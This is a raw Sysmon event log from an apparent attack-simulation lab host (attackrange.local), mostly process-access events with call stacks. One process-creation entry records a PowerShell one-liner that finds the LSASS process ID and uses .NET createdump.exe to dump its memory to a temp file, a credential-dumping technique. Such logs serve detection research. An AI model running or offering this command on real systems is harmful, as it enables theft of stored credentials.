21:10:30.801{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000026067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.801{4DB9351A-A345-60D3-6306-00000000CF01}36565804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000026066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.802{4DB9351A-A346-60D3-6606-00000000CF01}4540C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXE"C:\Windows\system32\findstr.exe" lsassC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {echo \""Createdump Path C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" $LSASS = tasklist | findstr \""lsass\"" $FIELDS = $LSASS -split \""\s+\"" $ID = $FIELDS[1] & \""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" -u -f C:\Windows\Temp\dotnet-lsass.dmp $ID} 10341000x800000000000000026065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.785{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 